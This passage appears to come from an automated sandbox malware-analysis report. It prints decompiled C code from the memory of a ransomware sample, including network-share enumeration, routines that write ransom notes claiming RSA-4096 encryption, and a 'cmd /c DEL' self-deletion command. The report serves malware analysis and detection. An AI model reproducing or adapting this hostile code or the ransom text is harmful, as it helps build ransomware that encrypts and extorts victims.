						while(1) {
							E0042D0A0(_t37, 0, _v8);
							_t54 = _t54 + 0xc;
							if(WNetEnumResourceW(_a4,  &_v12, _t37,  &_v8) != 0) {
								break;
							}
							_t50 = 0;
							if(_v12 > 0) {
								_t11 = _t37 + 0x14; // 0x14
								_t53 = _t11;
								do {
									_t29 =  *0x462840; // 0x0
									if(_t29 <= 0x40 &&  *((intOrPtr*)(_t53 - 0x14)) == 2 &&  *((intOrPtr*)(_t53 - 0x10)) == 1) {
										E0042623B((_t29 << 0xb) + 0x442040, 0x400,  *_t53);
										_t54 = _t54 + 0xc;
										 *0x462840 =  *0x462840 + 1;
									}
									if(( *(_t53 - 8) & 0x00000002) == 2) {
										_t15 = _t53 - 0x14; // 0x0
										E00413740(_t15);
									}
									_t50 = _t50 + 1;
									_t53 = _t53 + 0x20;
								} while (_t50 < _v12);
							}
						}
						GlobalFree(_t37);
						_t26 = WNetCloseEnum(_a4);
						asm("sbb eax, eax");
						return  ~_t26 + 1;
					} else {
						return _t20;
					}
				} else {
					return 0;
				}
			}

APIs

WNetOpenEnumW.MPR(00000002,00000000,00000000,00413A04,00413A04), ref: 00413764
GlobalAlloc.KERNEL32(00000040,00004000), ref: 0041377D
WNetEnumResourceW.MPR(FFFFFFFF,FFFFFFFF,00000000,00004000), ref: 004137AE
GlobalFree.KERNEL32(00000000), ref: 0041381A
WNetCloseEnum.MPR(FFFFFFFF), ref: 00413824

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042C614, Relevance: 7.6, APIs: 5, Instructions: 54

C-Code - Quality: 100%

			E0042C614() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t25;
				signed int _t34;

				_t14 =  *0x43f054; // 0xd6baf341
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
					GetSystemTimeAsFileTime( &_v12);
					_t16 = GetCurrentProcessId();
					_t17 = GetCurrentThreadId();
					_t18 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t22 = _v16 ^ _v20.LowPart;
					_t34 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
					if(_t34 != 0xbb40e64e) {
						if((0xffff0000 & _t34) == 0) {
							_t22 = (_t34 | 0x00004711) << 0x10;
							_t34 = _t34 | _t22;
						}
					} else {
						_t34 = 0xbb40e64f;
					}
					 *0x43f054 = _t34;
					 *0x43f058 =  !_t34;
					return _t22;
				} else {
					_t25 =  !_t14;
					 *0x43f058 = _t25;
					return _t25;
				}
			}

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0042C64B
GetCurrentProcessId.KERNEL32 ref: 0042C657
GetCurrentThreadId.KERNEL32 ref: 0042C65F
GetTickCount.KERNEL32 ref: 0042C667
QueryPerformanceCounter.KERNEL32(?), ref: 0042C673

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00411420, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 183

C-Code - Quality: 56%

			E00411420(signed int*** _a4, signed char* _a8) {
				signed int _v8;
				signed int** _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* __edi;
				void* __esi;
				signed char _t52;
				void* _t54;
				intOrPtr _t55;
				signed int** _t56;
				signed int** _t60;
				signed int _t61;
				signed int _t64;
				char _t66;
				signed int _t67;
				signed int* _t68;
				signed int* _t73;
				void* _t75;
				signed char* _t76;
				signed int _t77;
				signed int*** _t82;
				signed int _t83;
				signed int* _t85;
				char* _t88;
				signed int _t89;
				signed int _t90;
				signed int _t92;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				intOrPtr* _t98;
				signed int** _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				signed int _t103;
				void* _t106;
				void* _t107;

				_t1 =  &_a8; // 0x414de4
				_t76 =  *_t1;
				_t101 = 0;
				_v8 = 0;
				if(_t76 == 0) {
					L10:
					return 0;
				}
				_t52 =  *_t76;
				if(_t52 == 0) {
					goto L10;
				} else {
					if(_t52 == 0x2d) {
						_t76 =  &(_t76[1]);
						_v8 = 1;
						_a8 = _t76;
					}
				}
				_t98 = __imp__isxdigit;
				_t54 =  *_t98( *_t76 & 0x000000ff);
				_t107 = _t106 + 4;
				if(_t54 != 0) {
					do {
						_t90 = ( &(_t76[1]))[_t101] & 0x000000ff;
						_t101 = _t101 + 1;
						_t75 =  *_t98(_t90);
						_t107 = _t107 + 4;
					} while (_t75 != 0);
				}
				_t82 = _a4;
				_t55 = _t101 + _v8;
				_t92 = 0;
				_v24 = _t55;
				if(_t82 == 0) {
					return _t55;
				} else {
					_t99 =  *_t82;
					if(_t99 != 0) {
						_v12 = _t99;
						if(_t99[2] < 1) {
							_t56 = E0040D6F0(_t99, 1);
							_t107 = _t107 + 4;
							_t92 = 0;
						} else {
							_t56 = _t99;
						}
						if(_t56 != _t92) {
							_t73 =  *_t99;
							_t99[3] = _t92;
							 *_t73 = _t92;
							_t73[1] = _t92;
							_t99[1] = _t92;
						}
					} else {
						_t99 = E0040D580();
						_v12 = _t99;
						if(_t99 == 0) {
							goto L10;
						}
					}
					asm("cdq");
					_t59 = 0x3f + _t101 * 4 + (_t92 & 0x0000003f) >> 6;
					if(0x3f + _t101 * 4 + (_t92 & 0x0000003f) >> 6 > _t99[2]) {
						_t60 = E0040D6F0(_t99, _t59);
					} else {
						_t60 = _t99;
					}
					if(_t60 != 0) {
						_t83 = 0;
						_t61 = _t101;
						_v20 = _t61;
						_v16 = 0;
						if(_t101 > 0) {
							while(1) {
								_t100 = 0x10;
								if(_t61 < 0x10) {
									_t100 = _t61;
								}
								_t96 = 0;
								_t103 = 0;
								_t88 = _t61 - _t100 + _t76;
								do {
									_t66 =  *_t88;
									_t24 = _t66 - 0x30; // -48
									_t77 = _t24;
									if(_t77 > 9) {
										_t25 = _t66 - 0x61; // -97
										if(_t25 > 5) {
											_t26 = _t66 - 0x41; // -65
											if(_t26 > 5) {
												_t67 = 0;
											} else {
												_t67 = _t66 + 0xffffffc9;
											}
										} else {
											_t67 = _t66 + 0xffffffa9;
										}
									} else {
										_t67 = _t77;
									}
									_t97 = _t96 << 4;
									asm("cdq");
									_t103 = (_t103 << 0x00000020 | _t96) << 0x4 | _t97;
									_t100 = _t100 - 1;
									_t88 = _t88 + 1;
									_t96 = _t97 | _t67;
								} while (_t100 > 0);
								_t31 =  &_v16; // 0x414de4
								_t89 =  *_t31;
								_t99 = _v12;
								_t68 =  *_t99;
								 *(_t68 + _t89 * 8) = _t96;
								 *(_t68 + 4 + _t89 * 8) = _t103;
								_t61 = _v20 - 0x10;
								_t83 = _t89 + 1;
								_v16 = _t83;
								_v20 = _t61;
								if(_t61 > 0) {
									_t23 =  &_a8; // 0x414de4
									_t76 =  *_t23;
									continue;
								}
								goto L38;
							}
						}
						L38:
						_t99[1] = _t83;
						_t102 = _t83;
						if(_t83 > 0) {
							_t43 = _t83 * 8; // -8
							_t85 =  *_t99 + _t43 - 8;
							while(1) {
								_t64 =  *_t85;
								_t95 = _t85[1];
								_t85 = _t85 - 8;
								if((_t64 | _t95) != 0) {
									break;
								}
								_t102 = _t102 - 1;
								if(_t102 > 0) {
									continue;
								}
								break;
							}
							_t99[1] = _t102;
						}
						_t99[3] = _v8;
						 *_a4 = _t99;
						return _v24;
					} else {
						if( *_a4 != 0) {
							goto L10;
						}
						E0040D4F0(_t99);
						return 0;
					}
				}
			}

APIs

isxdigit.NTDLL(00000000,00000000,00000000,00000000,?,?,00414DE4,00000000,95667250209D992A05553BDF8CB0E1320B04B2E0FF9177FE88C32CF125FEA249), ref: 00411456
isxdigit.NTDLL(?,?,?,?,00414DE4,00000000,95667250209D992A05553BDF8CB0E1320B04B2E0FF9177FE88C32CF125FEA249), ref: 00411467

Strings

MA, xrefs: 00411429, 00411520
MA, xrefs: 00411581

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041F970, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37

C-Code - Quality: 100%

			E0041F970(WCHAR* __eax, void* __ecx) {
				long _v8;
				int _t5;
				intOrPtr* _t6;
				intOrPtr _t10;
				void* _t14;

				_v8 = 0;
				_t5 = CreateFileW(__eax, 0xc0000000, 0, 0, 4, 0x80, 0);
				_t14 = _t5;
				if(_t14 != 0xffffffff) {
					_t6 = 0x4665a8;
					do {
						_t10 =  *_t6;
						_t6 = _t6 + 1;
					} while (_t10 != 0);
					WriteFile(_t14, "<html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb {  background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:", _t6 - 0x4665a9,  &_v8, 0);
					_t5 = CloseHandle(_t14);
				}
				return _t5;
			}

0x0041f98a
0x0041f991
0x0041f997
0x0041f99c
0x0041f99e
0x0041f9a6
0x0041f9a6
0x0041f9a8
0x0041f9a9
0x0041f9bc
0x0041f9c3
0x0041f9c3
0x0041f9cd

APIs

CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041F991
WriteFile.KERNEL32(00000000,<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:,<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:,00000000,00000000), ref: 0041F9BC
CloseHandle.KERNEL32(00000000), ref: 0041F9C3

Strings

<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:, xrefs: 0041F99E, 0041F9B5, 0041F9B6

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 0041F910, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37

C-Code - Quality: 100%

			E0041F910(WCHAR* __eax, void* __ecx) {
				long _v8;
				int _t5;
				intOrPtr* _t6;
				intOrPtr _t10;
				void* _t14;

				_v8 = 0;
				_t5 = CreateFileW(__eax, 0xc0000000, 0, 0, 4, 0x80, 0);
				_t14 = _t5;
				if(_t14 != 0xffffffff) {
					_t6 = 0x462918;
					do {
						_t10 =  *_t6;
						_t6 = _t6 + 1;
					} while (_t10 != 0);
					WriteFile(_t14, " __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!  NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo", _t6 - 0x462919,  &_v8, 0);
					_t5 = CloseHandle(_t14);
				}
				return _t5;
			}

0x0041f92a
0x0041f931
0x0041f937
0x0041f93c
0x0041f93e
0x0041f946
0x0041f946
0x0041f948
0x0041f949
0x0041f95c
0x0041f963
0x0041f963
0x0041f96d

APIs

CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041F931
WriteFile.KERNEL32(00000000, __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo, __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo,00000000,00000000), ref: 0041F95C
CloseHandle.KERNEL32(00000000), ref: 0041F963

Strings

__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo, xrefs: 0041F93E, 0041F955, 0041F956

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 004266A5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16

C-Code - Quality: 100%

			E004266A5(intOrPtr _a4) {
				struct HINSTANCE__* _t2;

				_t2 = GetModuleHandleW(L"mscoree.dll");
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t2, "CorExitProcess");
					if(_t2 != 0) {
						return _t2->i(_a4);
					}
				}
				return _t2;
			}

0x004266af
0x004266b7
0x004266bf
0x004266c7
0x00000000
0x004266cc
0x004266c7
0x004266cf

APIs

GetModuleHandleW.KERNEL32(mscoree.dll,?,004266DD,?,?,0042594C,000000FF,0000001E,00000001,00000000,00000000,?,0042D12B,?,00000001,?), ref: 004266AF
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,004266DD,?,?,0042594C,000000FF,0000001E,00000001,00000000,00000000,?,0042D12B,?,00000001), ref: 004266BF

Strings

mscoree.dll, xrefs: 004266AA
CorExitProcess, xrefs: 004266B9

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 004031A0, Relevance: 6.2, APIs: 4, Instructions: 194

C-Code - Quality: 83%

			E004031A0(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
				char _v8;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				signed int _v40;
				signed int _t71;
				void* _t72;
				signed int _t74;
				signed int _t82;
				signed int _t88;
				signed int _t93;
				signed int _t98;
				void* _t99;
				intOrPtr _t100;
				void* _t105;
				signed int _t121;
				signed int _t125;
				signed int _t133;
				intOrPtr _t134;
				void* _t135;
				intOrPtr _t136;
				signed int _t141;
				signed int _t142;

				_t120 = __edx;
				_t71 = _a20;
				_t133 = _a24;
				_v40 = 0;
				_v8 = 2;
				if((_t71 | _t133) != 0) {
					_t72 = E0040D310(_t71, _t133);
					_t141 = _a8;
					_t98 = 0x40 - _t72;
					__eflags = _t141 - _t133;
					if(__eflags >= 0) {
						if(__eflags > 0) {
							L5:
							_t9 =  &_a4;
							 *_t9 = _a4 - _a20;
							__eflags =  *_t9;
							asm("sbb esi, edi");
							_a8 = _t141;
						} else {
							_t120 = _a4;
							__eflags = _t120 - _a20;
							if(_t120 >= _a20) {
								goto L5;
							}
						}
					}
					__eflags = _t98;
					if(_t98 != 0) {
						L004305EE();
						_a24 = _t133;
						L004305E8();
						_v16 = _a16;
						L004305EE();
						_t93 = _v16 | _t141;
						__eflags = _t93;
						_t120 = _a16;
						_a8 = _t93;
						_a4 = _a12 | _a4;
						L004305EE();
						L8:
						_t141 = _a8;
						_t133 = _a24;
						_a16 = _t120;
					}
					__eflags = _t141 - _t133;
					if(_t141 != _t133) {
						L12:
						_t99 = 0;
						__eflags = 0;
						_t74 = E00429DD0(_a4, _t141, _t133, 0);
						_v20 = _t74;
						_v16 = _t120;
						_t142 = _t74;
					} else {
						_t99 = 0;
						__eflags = 0;
						if(0 != 0) {
							goto L12;
						} else {
							_t142 = _t141 | 0xffffffff;
							_v16 = 0;
						}
					}
					_t121 = _v16;
					_t134 = E004304B0(_t142, _t121, _t133, _t99);
					_t100 = _t121;
					_v28 = E004304B0(_t142, _v16, _a20, 0);
					_t105 = _a4 - _t134;
					_v24 = _t121;
					asm("sbb eax, ebx");
					__eflags = _a8;
					if(_a8 == 0) {
						while(1) {
							_t88 = _a16;
							__eflags = _v24 - _t105;
							if(__eflags < 0) {
								goto L18;
							}
							if(__eflags > 0) {
								L17:
								asm("adc dword [ebp-0xc], 0xffffffff");
								_t136 = _t134 - _a24;
								asm("sbb ebx, ecx");
								_v28 = _v28 - _a20;
								_v20 = _t142 + 0xffffffff;
								asm("sbb [ebp-0x14], ecx");
								_t105 = _a4 - _t136;
								_v36 = _t136;
								asm("sbb esi, ebx");
								__eflags = _a8;
								_t142 = _v20;
								_t134 = _v36;
								if(_a8 == 0) {
									continue;
								}
							} else {
								__eflags = _v28 - _t88;
								if(_v28 > _t88) {
									goto L17;
								}
							}
							goto L18;
						}
					}
					L18:
					_t135 = _t134 + _v24;
					asm("adc ebx, ecx");
					__eflags = _a16 - _v28;
					if(__eflags <= 0) {
						if(__eflags < 0) {
							L21:
							_t135 = _t135 + 1;
							asm("adc ebx, ecx");
						} else {
							__eflags = _a12;
							if(_a12 < 0) {
								goto L21;
							}
						}
					}
					_a12 = _a12;
					_t125 = _a16;
					asm("sbb edx, eax");
					_t82 = _a4;
					__eflags = _a8 - _t100;
					if(__eflags <= 0) {
						if(__eflags < 0) {
							L25:
							_t82 = _t82 + _a20;
							asm("adc ecx, [ebp+0x1c]");
							_t142 = _t142 + 0xffffffff;
							asm("adc dword [ebp-0xc], 0xffffffff");
						} else {
							__eflags = _t82 - _t135;
							if(_t82 < _t135) {
								goto L25;
							}
						}
					}
					_t62 =  &_v8;
					 *_t62 = _v8 - 1;
					__eflags =  *_t62;
					if( *_t62 != 0) {
						_v40 = _t142;
						_t120 = _a12;
						_a8 = _t82 - _t135;
						_a4 = _t125;
						_a12 = 0;
						goto L8;
					}
					__eflags = _v16 | _v40;
					return _t142;
				} else {
					return _t71 | 0xffffffff;
				}
			}

APIs

_allshl.NTDLL ref: 0040320A
_aullshr.NTDLL ref: 00403222
_allshl.NTDLL ref: 00403233
_allshl.NTDLL ref: 0040324D

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042A364, Relevance: 6.1, APIs: 4, Instructions: 116

C-Code - Quality: 96%

			E0042A364(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t47;
				signed int _t52;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				long _t64;
				LONG* _t67;
				LONG* _t73;
				intOrPtr _t89;
				intOrPtr _t97;
				void* _t98;
				void* _t101;

				_t101 = __eflags;
				_t87 = __edx;
				_push(0x14);
				_push(0x43c1b0);
				E00428E80(__ebx, __edi, __esi);
				 *(_t98 - 0x20) =  *(_t98 - 0x20) | 0xffffffff;
				_t89 = E0042AA05(__ebx, _t101);
				 *((intOrPtr*)(_t98 - 0x24)) = _t89;
				E0042A05B(__ebx, __edx, _t89, __esi, _t101);
				_t47 = E0042A0FF( *((intOrPtr*)(_t98 + 8)));
				 *((intOrPtr*)(_t98 + 8)) = _t47;
				if(_t47 ==  *((intOrPtr*)( *(_t89 + 0x68) + 4))) {
					_t41 = _t98 - 0x20;
					 *_t41 =  *(_t98 - 0x20) & 0x00000000;
					__eflags =  *_t41;
					L26:
					return E00428EC5( *(_t98 - 0x20));
				}
				_t73 = E0042D11A(0x220);
				_t103 = _t73;
				if(_t73 == 0) {
					goto L26;
				}
				memcpy(_t73,  *(_t89 + 0x68), 0x88 << 2);
				 *_t73 =  *_t73 & 0x00000000;
				_t52 = E0042A17B(0, _t87, _t103,  *((intOrPtr*)(_t98 + 8)), _t73);
				 *(_t98 - 0x20) = _t52;
				if(_t52 != 0) {
					__eflags = _t52 - 0xffffffff;
					if(_t52 == 0xffffffff) {
						__eflags = _t73 - 0x43f460;
						if(__eflags != 0) {
							E004258E3(_t73);
						}
						 *((intOrPtr*)(E00427125(__eflags))) = 0x16;
					}
				} else {
					_t97 =  *((intOrPtr*)(_t98 - 0x24));
					if(InterlockedDecrement( *(_t97 + 0x68)) == 0) {
						_t69 =  *(_t97 + 0x68);
						if( *(_t97 + 0x68) != 0x43f460) {
							E004258E3(_t69);
						}
					}
					 *(_t97 + 0x68) = _t73;
					InterlockedIncrement(_t73);
					if(( *(_t97 + 0x70) & 0x00000002) == 0 && ( *0x43f980 & 0x00000001) == 0) {
						E0042B9FB(_t73, InterlockedIncrement, 0xd);
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						 *0x440e7c = _t73[1];
						 *0x440e80 = _t73[2];
						 *0x440e84 = _t73[3];
						_t61 = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t61;
							if(_t61 >= 5) {
								break;
							}
							 *((short*)(0x440e70 + _t61 * 2)) =  *((intOrPtr*)(_t73 + 0x10 + _t61 * 2));
							_t61 = _t61 + 1;
						}
						_t62 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t62;
							__eflags = _t62 - 0x101;
							if(_t62 >= 0x101) {
								break;
							}
							 *((char*)(_t62 + 0x43f680)) =  *((intOrPtr*)( &(_t73[7]) + _t62));
							_t62 = _t62 + 1;
						}
						_t63 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t63;
							__eflags = _t63 - 0x100;
							if(_t63 >= 0x100) {
								break;
							}
							 *((char*)(_t63 + 0x43f788)) =  *((intOrPtr*)( &(_t73[0x47]) + _t63));
							_t63 = _t63 + 1;
						}
						_t64 = InterlockedDecrement( *0x43f888);
						__eflags = _t64;
						if(_t64 == 0) {
							_t67 =  *0x43f888; // 0x1452500
							__eflags = _t67 - 0x43f460;
							if(_t67 != 0x43f460) {
								E004258E3(_t67);
							}
						}
						 *0x43f888 = _t73;
						InterlockedIncrement(_t73);
						 *(_t98 - 4) = 0xfffffffe;
						E0042A4C5();
					}
				}
			}

APIs

Part of subcall function 0042A05B: InterlockedDecrement.KERNEL32(?,0043C190,0000000C,00425F84,?,?,0042D410), ref: 0042A0B4
Part of subcall function 0042A05B: InterlockedIncrement.KERNEL32(01452500,0043C190,0000000C,00425F84,?,?,0042D410), ref: 0042A0DF

Part of subcall function 0042A0FF: GetOEMCP.KERNEL32(00000000), ref: 0042A128
Part of subcall function 0042A0FF: GetACP.KERNEL32(00000000), ref: 0042A14B

Part of subcall function 0042D11A: Sleep.KERNEL32(00000000,00000001,?,?,0042B986,00000018,0043C2A8,0000000C,0042BA16,?,?,?,0042A922,0000000D), ref: 0042D13B

Part of subcall function 0042A17B: IsValidCodePage.KERNEL32(-00000030), ref: 0042A1EE
Part of subcall function 0042A17B: GetCPInfo.KERNEL32(00000000,?), ref: 0042A201

InterlockedDecrement.KERNEL32(?,?,?,?,?,?,?,?,0043C1B0,00000014), ref: 0042A3DA
InterlockedIncrement.KERNEL32(00000000,?,?,?,?,?,?,?,0043C1B0,00000014), ref: 0042A3FF

Part of subcall function 0042B9FB: EnterCriticalSection.KERNEL32(?,?,?,0042A922,0000000D), ref: 0042BA25

InterlockedDecrement.KERNEL32 ref: 0042A491
InterlockedIncrement.KERNEL32(00000000), ref: 0042A4B5

Part of subcall function 004258E3: HeapFree.KERNEL32(00000000,00000000), ref: 004258F9
Part of subcall function 004258E3: GetLastError.KERNEL32(00000000,?,0042A9F6,00000000,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C,?,00001000), ref: 0042590B

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041FC50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83

C-Code - Quality: 51%

			E0041FC50(intOrPtr __ebx, WCHAR* __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				signed int _v8;
				short _v8200;
				char _v16392;
				signed int _t16;
				intOrPtr* _t18;
				intOrPtr* _t29;
				signed int _t48;

				_t47 = __esi;
				_t46 = __edi;
				_t44 = __edx;
				_t34 = __ebx;
				E0042E220(0x4004);
				_t16 =  *0x43f054; // 0xd6baf341
				_v8 = _t16 ^ _t48;
				_t18 = E00413000(__edx, 0, 1, 0x774393fe);
				_push(0x1000);
				_push( &_v8200);
				_push(0);
				if( *_t18() == 0) {
					L5:
					return E004256FE(0, _t34, _v8 ^ _t48, _t44, _t46, _t47);
				} else {
					_t44 =  &_v8200;
					if(GetShortPathNameW( &_v8200,  &_v8200, 0x1000) == 0) {
						goto L5;
					} else {
						E00425E37( &_v16392, 0x1000, L"/c ", 0x1000);
						E00425ACD( &_v16392, 0x1000, L"DE");
						E00425ACD( &_v16392, 0x1000, L"L ");
						_t44 =  &_v16392;
						E00425ACD( &_v16392, 0x1000,  &_v8200);
						_t29 = E00413000( &_v16392, 0, 1, 0x9802ef26);
						_push(0x1000);
						_push( &_v8200);
						_push(L"ComSpec");
						if( *_t29() == 0) {
							goto L5;
						} else {
							_t44 =  &_v8200;
							if(E00420870( &_v16392,  &_v8200) <= 0x20) {
								goto L5;
							} else {
								return E004256FE(1, __ebx, _v8 ^ _t48,  &_v8200, __edi, __esi);
							}
						}
					}
				}
			}

0x0041fc50
0x0041fc50
0x0041fc50
0x0041fc50
0x0041fc5a
0x0041fc5f
0x0041fc66
0x0041fc72
0x0041fc7a
0x0041fc85
0x0041fc86
0x0041fc8c
0x0041fd63
0x0041fd72
0x0041fc92
0x0041fc97
0x0041fca9
0x00000000
0x0041fcaf
0x0041fcc5
0x0041fcdb
0x0041fcf1
0x0041fcfd
0x0041fd09
0x0041fd17
0x0041fd1f
0x0041fd2a
0x0041fd2b
0x0041fd34
0x00000000
0x0041fd36
0x0041fd36
0x0041fd4e
0x00000000
0x0041fd50
0x0041fd62
0x0041fd62
0x0041fd4e
0x0041fd34
0x0041fca9

APIs

GetShortPathNameW.KERNEL32(?,?,00001000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041FCA1

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

/c , xrefs: 0041FCB4
ComSpec, xrefs: 0041FD2B

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042A8D8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40

C-Code - Quality: 91%

			E0042A8D8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t40;
				void* _t41;

				_t31 = __ebx;
				_push(8);
				_push(0x43c1f0);
				E00428E80(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t40 =  *((intOrPtr*)(_t41 + 8));
				 *((intOrPtr*)(_t40 + 0x5c)) = 0x432270;
				 *(_t40 + 8) =  *(_t40 + 8) & 0x00000000;
				 *((intOrPtr*)(_t40 + 0x14)) = 1;
				 *((intOrPtr*)(_t40 + 0x70)) = 1;
				 *((char*)(_t40 + 0xc8)) = 0x43;
				 *((char*)(_t40 + 0x14b)) = 0x43;
				 *(_t40 + 0x68) = 0x43f460;
				E0042B9FB(__ebx, 1, 0xd);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				InterlockedIncrement( *(_t40 + 0x68));
				 *(_t41 - 4) = 0xfffffffe;
				E0042A97A();
				E0042B9FB(_t31, 1, 0xc);
				 *(_t41 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t41 + 0xc));
				 *((intOrPtr*)(_t40 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x43fbc8; // 0x43faf0
					 *((intOrPtr*)(_t40 + 0x6c)) = _t30;
				}
				E0042A51C( *((intOrPtr*)(_t40 + 0x6c)));
				 *(_t41 - 4) = 0xfffffffe;
				return E00428EC5(E0042A983());
			}

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043C1F0,00000008,0042A9E0,00000000,00000000,?,004258DE,?,00000000,?,?,00000000,00000000,?,0041BB2C), ref: 0042A8E9

Part of subcall function 0042B9FB: EnterCriticalSection.KERNEL32(?,?,?,0042A922,0000000D), ref: 0042BA25

InterlockedIncrement.KERNEL32(0043F460), ref: 0042A92A

Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(?,00000001,?,?,?,0042A961,?), ref: 0042A52E
Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(00000000,?,0042A961,?), ref: 0042A53B
Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(00000000,?,0042A961,?), ref: 0042A548
Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(?,?,0042A961,?), ref: 0042A555
Part of subcall function 0042A51C: InterlockedIncrement.KERNEL32(?,?,0042A961,?), ref: 0042A562
